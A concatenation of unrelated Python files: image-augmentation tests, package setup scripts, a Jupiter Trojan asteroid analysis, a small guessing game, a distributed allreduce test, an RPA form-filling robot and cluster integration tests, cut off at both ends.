matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(50)]
expected1 = np.float32([
[0, 0, 0],
[1.0/3, 1.0/3, 1.0/3],
[0, 0, 0],
])
expected2 = np.float32([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1.0/5, 1.0/5, 1.0/5, 1.0/5, 1.0/5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
])
nb_seen = [0, 0]
for matrices_image in matrices:
assert np.allclose(matrices_image[0], matrices_image[1])
assert np.allclose(matrices_image[1], matrices_image[2])
for matrix_channel in matrices_image:
if matrix_channel.shape == expected1.shape and np.allclose(matrix_channel, expected1):
nb_seen[0] += 1
elif matrix_channel.shape == expected2.shape and np.allclose(matrix_channel, expected2):
nb_seen[1] += 1
assert nb_seen[0] > 0
assert nb_seen[1] > 0
# k with choice [a, b, c, ...] must error in case of non-discrete values
got_exception = False
try:
_ = iaa.MotionBlur(k=[3, 3.5, 4])
except Exception as exc:
assert "to only contain integer" in str(exc)
got_exception = True
assert got_exception
# no error in case of (a, b), checks for #215
aug = iaa.MotionBlur(k=(3, 7))
for _ in range(10):
_ = aug.augment_image(np.zeros((11, 11, 3), dtype=np.uint8))
# direction 1.0
aug = iaa.MotionBlur(k=3, angle=0, direction=1.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 1.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 0.0/1.5, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected, rtol=0, atol=1e-2)
# direction -1.0
aug = iaa.MotionBlur(k=3, angle=0, direction=-1.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 1.0/1.5, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected, rtol=0, atol=1e-2)
# random direction
aug = iaa.MotionBlur(k=3, angle=[0, 90], direction=[-1.0, 1.0])
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(50)]
expected1 = np.float32([
[0, 1.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 0.0/1.5, 0]
])
expected2 = np.float32([
[0, 0.0/1.5, 0],
[0, 0.5/1.5, 0],
[0, 1.0/1.5, 0]
])
nb_seen = [0, 0]
for matrices_image in matrices:
assert np.allclose(matrices_image[0], matrices_image[1])
assert np.allclose(matrices_image[1], matrices_image[2])
for matrix_channel in matrices_image:
if np.allclose(matrix_channel, expected1, rtol=0, atol=1e-2):
nb_seen[0] += 1
elif np.allclose(matrix_channel, expected2, rtol=0, atol=1e-2):
nb_seen[1] += 1
assert nb_seen[0] > 0
assert nb_seen[1] > 0
# test of actual augmenter
img = np.zeros((7, 7, 3), dtype=np.uint8)
img[3-1:3+2, 3-1:3+2, :] = 255
aug = iaa.MotionBlur(k=3, angle=90, direction=0.0)
img_aug = aug.augment_image(img)
v1 = (255*(1/3))
v2 = (255*(1/3)) * 2
v3 = (255*(1/3)) * 3
expected = np.float32([
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, v1, v2, v3, v2, v1, 0],
[0, v1, v2, v3, v2, v1, 0],
[0, v1, v2, v3, v2, v1, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]
]).astype(np.uint8)
expected = np.tile(expected[..., np.newaxis], (1, 1, 3))
assert np.allclose(img_aug, expected)
if __name__ == "__main__":
main()
|
import sys
from setuptools import setup, find_packages
install_requires = [
'boto3>=1.2.3,<2.0',
'clint>0.5,<1.0',
'PyYAML>=3,<4.0',
'troposphere==2.0',
'Jinja2>=2.8,<3.0',
'six>1.9,<2.0'
]
# as of Python >= 2.7 argparse module is maintained within Python.
if sys.version_info < (2, 7):
install_requires.append('argparse>=1.1.0')
setup(
name='gordon',
version='0.7.0',
url='https://github.com/ZextrasGiacomoMattiuzzi/gordon',
license='BSD',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description='Gordon is a tool to create, wire and deploy AWS Lambdas using CloudFormation',
keywords="aws lambda apigateway kinesis dynamodb s3 cloudwatch",
packages=find_packages(),
platforms='any',
install_requires=install_requires,
test_suite='nose.collector',
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Utilities'
],
entry_points={
'console_scripts': [
'gordon = gordon.bin:main',
]
},
include_package_data=True,
zip_safe=False,
use_2to3=True
)
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
target = '1kB'
radeg = np.pi/180
def cart_to_pol(x,y):
r = np.sqrt(x**2 + y**2)
phi = np.arctan2(y,x)
return r, phi
def pol_to_cart(r,phi):
x = r*np.cos(phi)
y = r*np.sin(phi)
return x, y
def L45(msun,mjup):
u2 = mjup/(msun+mjup)
x_L4 = 0.5 - u2
x_L5 = x_L4
y_L4 = np.sqrt(3)/2
y_L5 = -y_L4
return np.array([x_L4,x_L5]), np.array([y_L4,y_L5])
def L45_nonnorm(xjup,yjup,xsun,ysun):
phi_jup = np.arctan2(yjup,xjup)
phi_L4 = phi_jup + np.pi/3
phi_L5 = phi_jup - np.pi/3
xsep = (xsun - xjup)
ysep = (ysun - yjup)
r_jupsol = np.sqrt(xsep**2 + ysep**2)
x_L4 = r_jupsol*np.cos(phi_L4)
x_L5 = r_jupsol*np.cos(phi_L5)
y_L4 = r_jupsol*np.sin(phi_L4)
y_L5 = r_jupsol*np.sin(phi_L5)
return np.array([x_L4,x_L5]), np.array([y_L4,y_L5])
def hill(a,e,m,M):
return a*(1-e)*np.power(m/(3*M),1/3)
def r_pol(r,psi,M1,M2,a):
q = M2/M1
z = np.zeros((len(psi),len(r)))
for i, phi in enumerate(psi):
x_ = r*np.cos(phi)
y_ = r*np.sin(phi)
x = x_/a
y = y_/a
s1 = np.sqrt(x**2 + y**2)
s2 = np.sqrt((x-1)**2 + y**2)
term1 = 2/(s1*(1+q))
term2 = 2*q/(s2*(1+q))
term3 = (x - q/(1+q))**2
term4 = y**2
z[i] = term1 + term2 + term3 + term4
return z
ast_d = np.load('{0}_Trojandata.npy'.format(target))
num_asts = len(ast_d[0,:,0])
print(ast_d.shape)
jup_d = np.load('{0}_Planetdata.npy'.format(target))
sol_d = np.load('{0}_Stardata.npy'.format(target))
times = np.load('{0}_Timesteps.npy'.format(target))
ast_a = ast_d[0]; ast_e = ast_d[1]; ast_i = ast_d[2]
ast_o = ast_d[3]; ast_p = ast_d[4]; ast_l = ast_d[5]
ast_x = ast_d[6]; ast_y = ast_d[7]; ast_z = ast_d[8]
ast_meda = np.median(ast_a,axis=0)
jup_a = jup_d[0]; jup_e = jup_d[1]; jup_i = jup_d[2]; jup_p = jup_d[3]
jup_l = jup_d[4]; jup_x = jup_d[5]; jup_y = jup_d[6]; jup_z = jup_d[7]
sol_m = sol_d[0]; sol_l = sol_d[1]; sol_x = sol_d[2]; sol_y = sol_d[3]; sol_z = sol_d[4]
jhill = hill(jup_a,jup_e,9.546e-4,sol_m)
dst_jall = np.sqrt((ast_x - jup_x)**2 + (ast_y - jup_y)**2)
L45x, L45y = L45_nonnorm(jup_x,jup_y,sol_x,sol_y)
L4_xs = L45x[0]; L4_ys = L45y[0]
L5_xs = L45x[1]; L5_ys = L45y[1]
i_dif = np.zeros_like(ast_i)
i_int = ast_i[:,0]
for i in range(len(ast_a[0,:])):
i_dif[:,i] = ast_i[:,i] - i_int
phi_vals = np.linspace(-np.pi,np.pi,500)
Z = r_pol(jup_a,phi_vals,sol_m,9.546e-4,jup_a)
Pot = np.flip(Z,1)
ast_r, ast_h = cart_to_pol(ast_x,ast_y)
jup_r, jup_h = cart_to_pol(jup_x,jup_y)
phdif = np.zeros_like(ast_h)
for i in range(len(jup_h)):
phdif[:,i] = ast_h[:,i] - jup_h[i]
id4 = []
id5 = []
for i in range(num_asts):
for it in range(len(jup_h)):
if phdif[i,it] < -np.pi:
phdif[i,it] = phdif[i,it] + 2*np.pi
if phdif[i,it] > np.pi:
phdif[i,it] = phdif[i,it] - 2*np.pi
if phdif[i,0] > 0:
id4.append(i)
if phdif[i,0] < 0:
id5.append(i)
print('Percentage at L4: %2.1f' %(len(id4)*100/num_asts))
liba = np.zeros((num_asts,200))
libp = np.zeros((num_asts,200))
for i in range(num_asts):
for n in range(200):
high = int(500*(n+1))
loww = int(500*n)
pmax = np.amax(phdif[i,loww:high])
pmin = np.amin(phdif[i,loww:high])
amax = np.amax(ast_a[i,loww:high])
amin = np.amin(ast_a[i,loww:high])
amid = np.median(jup_a[loww:high])
if pmax > 0:
mid = np.pi/3
if pmax < 0:
mid = -np.pi/3
lip = ((pmax - mid) + (pmin - mid)) / 2
lia = ((amax - amid)+(amin - amid)) / 2
libp[i,n] = abs(lip)
liba[i,n] = abs(lia)
indices = []
hillers = []
for i in range(num_asts):
it = 0
while it < len(ast_meda):
a_focus = ast_a[i,it]
a_media = ast_meda[it]
if a_focus > a_media + 2:
indices.append(i)
break
elif a_focus < a_media - 2:
indices.append(i)
break
else:
it += 1
it = 0
while it < len(jhill):
d = dst_jall[i,it]
h = jhill[it]
if d <= h + 0.1:
hillers.append(i)
break
else:
it += 1
idx = np.array(indices)
hdx = np.array(hillers)
hill_not_sma = np.array(list(set(hillers) - set(indices)))
ndx = np.array(list(set(range(num_asts)) - set(indices)))
print("Number of escapers: ", len(indices))
print("Number of hill crossers: ", len(hillers))
pct = len(indices)/num_asts
print('Pct escaped / Total Asts: %0.2f' %pct)
nrm_a = ast_a[ndx]; nrm_e = ast_e[ndx]; nrm_i = ast_i[ndx]; ndifi = i_dif[ndx]; nrmla = liba[ndx]
nrm_p = ast_p[ndx]; nrm_l = ast_l[ndx]; nrm_x = ast_x[ndx]; nrm_y = ast_y[ndx]; nrmlp = libp[ndx]
odd_a = ast_a[idx]; odd_e = ast_e[idx]; odd_i = ast_i[idx]; odifi = i_dif[idx]; oddla = liba[idx]
odd_p = ast_p[idx]; odd_l = ast_l[idx]; odd_x = ast_x[idx]; odd_y = ast_y[idx]; oddlp = libp[idx]
nrm_r, nrmph = cart_to_pol(nrm_x,nrm_y); odd_r, oddph = cart_to_pol(odd_x,odd_y)
jup_r, jupph = cart_to_pol(jup_x,jup_y); sol_r, solph = cart_to_pol(sol_x,sol_y)
L4_rs, L4phs = cart_to_pol(L4_xs,L4_ys); L5_rs, L5phs = cart_to_pol(L5_xs,L5_ys)
distj = np.sqrt((odd_x - jup_x)**2 + (odd_y - jup_y)**2)
disth = np.sqrt((ast_x[hdx] - jup_x)**2 + (ast_y[hdx] - jup_y)**2)
dists = np.sqrt((odd_x - sol_x)**2 + (odd_y - sol_y)**2)
jdist = np.sqrt((jup_x - sol_x)**2 + (jup_y - sol_y)**2)
earlies = []
laties = []
hill_cross = np.zeros(len(hdx))
for i in range(len(odd_a)):
it = 0
while it < 100000:
a_focus = odd_a[i,it]
a_media = ast_meda[it]
if a_focus > a_media + 2:
if it < 33333:
earlies.append(i)
break
elif it > 70000:
laties.append(i)
break
else:
break
elif a_focus < a_media - 2:
if it < 33333:
earlies.append(i)
break
elif it > 70000:
laties.append(i)
break
else:
break
else:
it += 1
for i in range(len(hdx)):
it = 0
while it < 100000:
d = disth[i,it]
h = jhill[it]
if d <= h:
hill_cross[i] = it
break
else:
it += 1
horses = []
for number,n in enumerate(idx):
i = 0
while i < 5000:
val = phdif[n,i]
if 170*radeg <= val:
horses.append(n)
break
elif val <= -170*radeg:
horses.append(n)
break
elif -5*radeg <= val <= 5*radeg:
horses.append(n)
break
i += 1
hrs = np.array(horses)
trs = np.array( list( set(idx) - set(horses) ) )
edx = np.array(earlies)
ldx = np.array(laties)
print("Number of early escapees: ", len(earlies), " (escaped before .67 Myr)")
print("Number of late escapees: ", len(laties), " (escaped after %1.2f Myr)" %(times[70000]/1e6))
pct_e = len(earlies)/len(indices)
pct_l = len(laties)/len(indices)
print('Number early / Total escapees: %0.2f' %pct_e)
print('Number late / Total escapees: %0.2f' %pct_l)
pcT_e = len(earlies)/num_asts
pcT_l = len(laties)/num_asts
print('Number early / Total Asts.: %0.2f' %pcT_e)
print('Number late / Total Asts.: %0.2f' %pcT_l)
x_axis = np.linspace(0,times[33333]/1e6)
x_axi2 = np.linspace(times[70000]/1e6,times[-1]/1e6)
fig, ax = plt.subplots(3,figsize=(14,13),sharex=True,gridspec_kw={'height_ratios': [3, 1, .75]})
plt.subplots_adjust(hspace=0)
ax[0].plot(times/1e6,ast_meda,'k',lw=3)
ax[0].vlines([times[33333]/1e6,times[70000]/1e6],5,9.5,'b',alpha=0.8,zorder=0)
ax[0].fill_between(x_axis,5*np.ones_like(x_axis),9.5*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[0].fill_between(x_axi2,5*np.ones_like(x_axis),9.5*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[0].plot(times/1e6,jup_a,'gold',lw=3)
ax[0].legend(['Median Ast.','Planet'],fontsize=16,frameon=False,loc='upper left')
ax[0].set_ylabel('Semimajor Axis / AU',fontsize=16)
ax[0].set_ylim(5,9.5)
ax[0].set_xlim(0,2)
ax[0].text(0.18,7.25,"%1.i escaped" %len(earlies),fontsize=25)
ax[0].text(0.8,7.25,"%2.i escaped" %(len(indices) - len(earlies) - len(laties)),fontsize=25)
ax[0].text(1.48,7.25,"%2.i escaped" %len(laties),fontsize=25)
ax[1].plot(times/1e6,sol_l,'orange',lw=3,zorder=10)
ax[1].plot(times/1e6,sol_m,'g',ls=':',lw=3,zorder=10)
ax[1].vlines([times[33333]/1e6,times[70000]/1e6],0,4,'b',alpha=0.8,zorder=0)
ax[1].legend(["log Stellar Luminosity", "Stellar Mass"],fontsize=16,loc='center left',frameon=False)
ax[1].set_ylabel("Solar Units",fontsize=16)
ax[1].set_ylim(0,4)
ax[1].fill_between(x_axis,0*np.ones_like(x_axis),4*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[1].fill_between(x_axi2,0*np.ones_like(x_axis),4*np.ones_like(x_axis),facecolor='b',alpha=0.2,zorder=0)
ax[1].set_xlabel('Time / Myr',fontsize=16)
ax[1].set_yticks([0,1,2,3])
ax[2].hist(hill_cross*20/1e6,edgecolor='k',facecolor='k',alpha=0.5,range=[0,2],bins=20)
ax[2].set_ylabel("Escapes",fontsize=16)
ax[2].set_xlabel("Time / Myr",fontsize=16)
ax[2].set_ylim(0,35)
ax[2].set_yticks([0,10,20,30])
fig.savefig('{0}_Timeseries.pdf'.format(target),dpi=300)
############
hist, axh = plt.subplots(1,4,figsize=(20,5))
axh[0].hist(nrm_a[:,0],edgecolor='k',histtype='step',range=[4.95,5.45])
axh[0].hist(odd_a[:,0],facecolor='r',alpha=0.7,range=[4.95,5.45])
axh[0].set_xlabel("SMA (AU)",fontsize=16)
axh[0].set_xlim(4.95,5.45)
axh[1].hist(nrm_e[:,0],edgecolor='k',histtype='step',range=[0,.25])
axh[1].hist(odd_e[:,0],facecolor='r',alpha=0.7,range=[0,.25])
axh[1].set_xlabel("Eccentricity",fontsize=16)
axh[1].set_xlim(0,0.25)
axh[2].hist(abs(nrmla[:,0]),edgecolor='k',histtype='step',range=[0,0.02],bins=20)
axh[2].hist(abs(liba[trs,0]),facecolor='r',alpha=0.7,range=[0,0.02],bins=20)
axh[2].set_xlabel("SMA Libration Amp. (AU)",fontsize=16)
axh[2].set_xlim(0,.02)
axh[2].set_xticks([0,0.005,0.01,0.015,0.02])
radeg = np.pi/180
axh[3].hist(abs(nrmlp[:,0])/radeg,edgecolor='k',histtype='step',range=[0,35])
axh[3].hist(abs(libp[trs,0])/radeg,facecolor='r',alpha=0.7,range=[0,35])
axh[3].set_xlabel(r"$\lambda$ Libration Amplitude (Deg.)",fontsize=16)
axh[3].set_xlim(0,35)
axh[3].legend(labels=['Stable','Escaped'],fontsize=14,frameon=False,loc='upper right')
hist.suptitle('Initial conditions',fontsize=18)
hist.savefig('{0}_Histograms.pdf'.format(target),dpi=300)
#############
orf, ora = plt.subplots(1,2,figsize=(15,5),gridspec_kw={'width_ratios': [2, 1]})
for i in range(len(ndx)):
ora[0].plot(phdif[ndx[i],:500],ast_a[ndx[i],:500]/5.2,'k',alpha=0.01,zorder=5)
for i,tr in enumerate(trs):
ora[0].plot(phdif[tr,:500],ast_a[tr,:500]/5.2,'r',alpha=0.05,zorder=10)
ora[0].set_xlim(-np.pi,np.pi)
ora[0].set_ylim(.9,1.1)
ora[0].set_xlabel(r"$\phi - \phi_{jup}$",fontsize=16)
ora[0].set_ylabel(r"SMA / $a_{jup}$",fontsize=16)
ora[0].vlines([-np.pi/3,np.pi/3],0.9,1.1,ls='--',zorder=0)
ora[0].set_xticks([-np.pi,-np.pi/2,-np.pi/3,0,np.pi/3,np.pi/2,np.pi])
ora[0].set_xticklabels([r"-$\pi$",r"-$\pi$/2",r"$L_5$",'0',r"$L_4$",r"$\pi$/2",r"$\pi$"])
sns.kdeplot(abs(nrmlp[:,0])/radeg,nrmla[:,0],shade=True,shade_lowest=None,cmap='Greys',levels=5,alpha=0.5)
sns.kdeplot(abs(libp[trs,0])/radeg,liba[trs,0],shade=True,shade_lowest=None,cmap='Reds',levels=5,alpha=0.5)
ora[1].set_ylabel("Init. SMA Libration (AU)",fontsize=16)
ora[1].set_xlabel(r"Init. $\lambda$ Libration (Deg.)",fontsize=16)
ora[1].set_xlim(0,35)
orf.tight_layout()
orf.savefig('{0}_Orbits.pdf'.format(target),dpi=300)
#############
norm = mpl.colors.Normalize(vmin = np.min(.005), vmax = np.max(.015), clip = False)
tim, tax = plt.subplots(figsize=(7,6))
scatter = tax.scatter(abs(libp[hdx,0])/radeg,hill_cross*20/1e6,c=abs(liba[hdx,0]),cmap='Reds',norm=norm)
tax.set_xlim(0,35)
tax.set_xlabel(r"Initial $\lambda$ Libration (Deg.)",fontsize=16)
tax.set_ylabel('Time of Encounter (Myr)',fontsize=16)
tim.colorbar(scatter, label='Initial SMA Libration (AU)')
tax.set_ylim(0,2)
tim.savefig('{0}_Eject_Perts.pdf'.format(target),dpi=300)
######################
hill_data = np.array((hdx,hill_cross))
np.save('{0}_Ejects.npy'.format(target), idx)
np.save('{0}_Hillcr.npy'.format(target), hill_data)
|
import codecs
import os
import re
from setuptools import find_packages, setup
###############################################################################
# Using setup.py from Attrs as a template for finding components, awesome config.
# Original reference: https://github.com/python-attrs/attrs/blob/master/setup.py
NAME = "mutatest"
PACKAGES = find_packages()
META_PATH = os.path.join("mutatest", "__init__.py")
KEYWORDS = ["mutatest", "mutation", "testing", "test", "mutant", "mutate", "pytest"]
PROJECT_URLS = {
"Documentation": "https://mutatest.readthedocs.io/",
"Bug Tracker": "https://github.com/EvanKepner/mutatest/issues",
"Source Code": "https://github.com/EvanKepner/mutatest",
}
CLASSIFIERS = [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Natural Language :: English",
"Environment :: Console",
"Framework :: Pytest",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Quality Assurance",
"Topic :: Software Development :: Testing",
"Topic :: Software Development :: Testing :: Unit",
]
# Built to run with pytest, but not an installation requirement for the API
INSTALL_REQUIRES = ["coverage>=4.4"]
EXTRAS_REQUIRE = {
"docs": ["coverage", "ipython", "sphinx"], # kept in docs/requirements.txt for RTD
"tests": [
"pytest >= 4.0.0",
"freezegun",
"coverage",
"pytest-cov",
"pytest-xdist",
"tox",
"virtualenv",
"hypothesis",
],
"qa": ["mypy", "black", "pre-commit", "isort"],
}
EXTRAS_REQUIRE["dev"] = EXTRAS_REQUIRE["tests"] + EXTRAS_REQUIRE["docs"] + EXTRAS_REQUIRE["qa"]
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
Build an absolute path from *parts* and and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
META_FILE = read(META_PATH)
def find_meta(meta):
"""
Extract __*meta*__ from META_FILE.
"""
meta_match = re.search(r"^__{meta}__ = ['\"]([^'\"]*)['\"]".format(meta=meta), META_FILE, re.M)
if meta_match:
return meta_match.group(1)
raise RuntimeError("Unable to find __{meta}__ string.".format(meta=meta))
VERSION = find_meta("version")
URL = find_meta("url")
LONG = "\n\n".join([read("README.rst"), read("CHANGELOG.rst"), read("AUTHORS.rst")])
if __name__ == "__main__":
setup(
name=NAME,
description=find_meta("description"),
license=find_meta("license"),
url=URL,
project_urls=PROJECT_URLS,
version=VERSION,
author=find_meta("author"),
author_email=find_meta("email"),
maintainer=find_meta("author"),
keywords=KEYWORDS,
long_description=LONG,
packages=PACKAGES,
python_requires=">=3.7.0",
zip_safe=False,
entry_points={"console_scripts": ["mutatest=mutatest.cli:cli_main"]},
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
include_package_data=True,
)
|
from random import randint
from os import system
c = 0
#Limpa tela
system('cls')
print('=-'*20)
print('VAMOS JOGAR PAR OU IMPAR')
print('=-'*20)
#Loop do programa
while True:
n = int(input('Diga um valor: '))
computador = randint (0, 10)
while True:
decisao = str(input('Par ou impar [P/I] ')).upper()
if decisao in 'PI':
break
else:
print('Por favor escolha par ou impar')
if (n + computador) % 2 == 0:
print('-'*40)
print(f'Voce jogou {n} e o computador {computador}. Total {n+computador} deu PAR')
if decisao == 'P':
print('=-'*20)
print('Voce venceu')
c += 1
elif decisao == 'I':
print('Voce perdeu')
print('=-'*20)
print(f'GAME OVER! Voce venceu {c} vezes')
break
else:
print('-'*40)
print(f'Voce jogou {n} e o computador {computador}. Total {n+computador} deu IMPAR')
print('-'*40)
if decisao == 'I':
print('=-'*20)
print('Voce venceu')
c += 1
elif decisao == 'P':
print('Voce perdeu')
print('=-'*20)
print(f'GAME OVER! Voce venceu {c} vezes')
break
print('='*20)
#SOLUCAO ORIGINAL COM 28 LINHAS
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test hccl allreduce performance with 8p"""
import os
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import dtype as mstype
from mindspore.ops import operations as P
import mindspore.communication.management as D
from mindspore import context
from mindspore.context import ParallelMode
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
np.random.seed(1)
os.environ['GLOG_v'] = str(2)
class AllReduceNet(nn.Cell):
def __init__(self):
super(AllReduceNet, self).__init__()
self.mul = P.Mul()
self.all_reduce = P.AllReduce()
self.add = P.Add()
def construct(self, x):
x = self.mul(x, 2)
y1 = Tensor(np.array([[2, 2, 2, 2], [2, 2, 2, 2], [2, 2, 2, 2]])).astype(np.float32)
z = self.add(x, y1)
z = self.all_reduce(z)
y2 = Tensor(np.array([[-16, -16, -16, -16], [-16, -16, -16, -16], [-16, -16, -16, -16]])).astype(np.float32)
out = self.add(z, y2)
out = self.all_reduce(out)
out = self.mul(out, 2)
return out
def train_allreduce_8p(q, device_id, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", device_id=device_id)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=False,
device_num=device_num)
net = AllReduceNet()
input_x = np.ones([3, 4]).astype(np.float32)
output = net(Tensor(input_x, mstype.float32))
q.put(output)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_pynative_hccl_allreduce_8p():
device_num = 8
process = []
q = Queue()
for i in range(device_num):
device_id = i
process.append(Process(target=train_allreduce_8p, args=(q, device_id, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
# check result
for i in range(device_num):
expect_output = [[256, 256, 256, 256], [256, 256, 256, 256], [256, 256, 256, 256]]
assert not q.empty()
output = Tensor(q.get())
assert np.allclose(output.asnumpy(), expect_output)
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
|
# Directly download tasks when nlp format is different than original dataset
SQUAD_TASKS = {"squad_v1", "squad_v2"}
DIRECT_DOWNLOAD_TASKS_TO_DATA_URLS = {
"wsc": f"https://dl.fbaipublicfiles.com/glue/superglue/data/v2/WSC.zip",
"multirc": f"https://dl.fbaipublicfiles.com/glue/superglue/data/v2/MultiRC.zip",
"record": f"https://dl.fbaipublicfiles.com/glue/superglue/data/v2/ReCoRD.zip",
}
DIRECT_DOWNLOAD_TASKS = DIRECT_DOWNLOAD_TASKS_TO_DATA_URLS.keys()
|
import json
from types import SimpleNamespace
with open('./config/config.json') as json_file:
data = json.load(json_file, object_hook=lambda d: SimpleNamespace(**d))
|
# Robot to enter weekly sales data into the RobotSpareBin Industries Intranet.
import os
from Browser import Browser
from Browser.utils.data_types import SelectAttribute
from RPA.Excel.Files import Files
from RPA.HTTP import HTTP
from RPA.PDF import PDF
browser = Browser()
def open_the_intranet_website():
browser.new_page("https://robotsparebinindustries.com/")
def log_in():
browser.type_text("css=#username", "maria")
browser.type_secret("css=#password", "thoushallnotpass")
browser.click("text=Log in")
def download_the_excel_file():
http = HTTP()
http.download(
url="https://robotsparebinindustries.com/SalesData.xlsx",
overwrite=True)
def fill_and_submit_the_form_for_one_person(sales_rep):
browser.type_text("css=#firstname", sales_rep["First Name"])
browser.type_text("css=#lastname", sales_rep["Last Name"])
browser.type_text("css=#salesresult", str(sales_rep["Sales"]))
browser.select_options_by(
"css=#salestarget",
SelectAttribute["value"],
str(sales_rep["Sales Target"]))
browser.click("text=Submit")
def fill_the_form_using_the_data_from_the_excel_file():
excel = Files()
excel.open_workbook("SalesData.xlsx")
sales_reps = excel.read_worksheet_as_table(header=True)
excel.close_workbook()
for sales_rep in sales_reps:
fill_and_submit_the_form_for_one_person(sales_rep)
def collect_the_results():
browser.take_screenshot(
filename=f"{os.getcwd()}/output/sales_summary.png",
selector="css=div.sales-summary")
def export_the_table_as_a_pdf():
sales_results_html = browser.get_property(
selector="css=#sales-results", property="outerHTML")
pdf = PDF()
pdf.html_to_pdf(sales_results_html, "output/sales_results.pdf")
def log_out():
browser.click("text=Log out")
def main():
try:
open_the_intranet_website()
log_in()
download_the_excel_file()
fill_the_form_using_the_data_from_the_excel_file()
collect_the_results()
export_the_table_as_a_pdf()
finally:
log_out()
browser.playwright.close()
if __name__ == "__main__":
main()
|
import os
import re
import sys
import time
from subprocess import PIPE, run
from types import ModuleType
from typing import Union
import docker
import requests
import storm.__main__ as storm
from lazycluster import Runtime, RuntimeGroup, RuntimeManager, RuntimeTask
from .config import RUNTIME_DOCKER_IMAGE, RUNTIME_NAMES, WORKSPACE_PORT
def setup_module(module: ModuleType) -> None:
""" setup any state specific to the execution of the given module."""
docker_client = docker.from_env()
for runtime_name in RUNTIME_NAMES:
_start_runtime_container(runtime_name, docker_client)
# Sleep a moment to give all processes time to start within the Workspace containers
time.sleep(15)
for runtime_name in RUNTIME_NAMES:
_setup_ssh_connection_to_runtime(runtime_name)
def teardown_module(module: ModuleType) -> None:
"""teardown any state that was previously setup with a setup_module
method.
"""
_remove_runtimes()
class TestRuntime:
def test_setup(self) -> None:
for runtime_name in RUNTIME_NAMES:
completed_process = run(
f"ssh {runtime_name} 'echo $WORKSPACE_NAME'",
shell=True,
stdout=PIPE,
stderr=PIPE,
)
assert completed_process.stderr == b"", "The stderr is not emtpy"
stdout = completed_process.stdout.decode("UTF-8").replace("\n", "")
assert stdout == runtime_name, "Stdout is not equal to the runtime_name"
if not RUNTIME_NAMES:
raise RuntimeError("No runtime names in integration/config.py configured")
Runtime(RUNTIME_NAMES[0])
def test_echo(self) -> None:
runtime_name = RUNTIME_NAMES[len(RUNTIME_NAMES) - 1]
rt = Runtime(runtime_name)
msg = f"Hello Runtime {runtime_name}"
assert rt.echo(msg).rstrip("\n") == msg
def test_working(self) -> None:
runtime_name = RUNTIME_NAMES[0]
exp_working_dir = "/etc"
rt = Runtime(runtime_name, working_dir=exp_working_dir)
act_working_dir = rt.echo("${PWD}").rstrip("\n")
assert exp_working_dir == act_working_dir
task = RuntimeTask("get-working-dir").run_command("echo ${PWD}")
rt.execute_task(task, execute_async=False)
assert exp_working_dir == rt.execution_log(task.name)[0].rstrip("\n").rstrip(
"\r"
)
class TestRuntimeGroup:
def test_creation(self) -> None:
